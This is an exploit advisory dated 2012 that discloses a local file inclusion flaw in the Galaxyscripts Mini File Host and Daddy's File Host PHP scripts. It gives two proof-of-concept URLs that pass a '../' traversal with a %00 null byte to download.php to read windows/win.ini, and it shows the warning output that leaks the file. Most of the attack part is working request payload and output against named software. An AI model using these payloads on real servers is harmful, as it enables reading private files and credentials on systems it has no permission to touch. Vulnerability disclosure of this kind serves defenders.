####################################################
### Exploit Title: Galaxyscripts / Daddy's File Host (All Versions) Local File Inclusion Vulnerability
### Date: 09/08/2012
### Author: L0n3ly-H34rT
### Homepage: http://se3c.tk/
### Contact: l0n3ly_h34rt@hotmail.com
### Software Link For Galaxyscripts 2.0 Beta : http://rapidshare.com/files/79821189/MFH_v2.0_Beta_webgraf.ru.rar
### Or Download Galaxyscripts 1.5 : http://www.phpkode.com/download/p/Mini_File_Host-1.5.zip
### Software Link For Daddy's : http://www.daddyscripts.com/download.php?file=dfh-v1.2.5.zip
### Tested on: Linux/Windows
### Approve For Galaxyscripts 2.0 Beta : http://upload.traidnt.net/upfiles/Fbq13249.png
### Approve For Galaxyscripts 1.5 : http://upload.traidnt.net/upfiles/ZHN13291.png
### Approve For Daddy's File Host 1.2.4 : http://upload.traidnt.net/upfiles/AT613341.png
####################################################

# Introduction :

This two scripts have same source but galaxyscripts doesn't support anymore in last year ago or may be two ! i don't know!

he put messegae in his homepage of script :

http://www.galaxyscripts.com/

the content of message :

Mini File Host & GalaxyScripts

Hi Guys,

GalaxyScripts.com recently got hacked and I haven't had the time to patch everything up. I'm wrapping up some other projects. I have a new version of MiniFilehost in the making, its completely being re-built from scratch, but it will be backwards compatible with your old files and configuration. The new version will use the Smarty Templating system so that new skins or templates can be easily made and modified. This seperates the application layer from the presentation layer. In the meantime if you need a script for hosting files, you can use daddyscripts( http://www.daddyscripts.com/ ). -Steven Johal ( http://www.stevenjohal.com/ )

# P.O.C (1) For Daddy's File Host:

- First, sign up & in as user in Daddy's File Host to bypass some ads & get that work ..

- Then put that in url e.g. :

http://127.0.0.1/dfh/download.php?file=../../../../../../../../../../windows/win.ini%00.jpg

- You see first line of file in warning e.g. :

Warning: filesize() [function.filesize]: stat failed for ./storage/; for 16-bit app support in C:\AppServ\www\dfh\download.php on line 164

----------------------------------------------------

# P.O.C (2) For Galaxyscripts :

- Just apply that in url e.g. :

http://127.0.0.1/MFH/download.php?file=../../../../../../../../../../windows/win.ini%00.jpg

- You see first line of file in warning e.g. :

Warning: filesize() [function.filesize]: stat failed for ./storage/; for 16-bit app support in C:\AppServ\www\MFH\download.php on line 142

# Note :

Must Be magic_quotes_gpc = Off

# Greetz to my friendz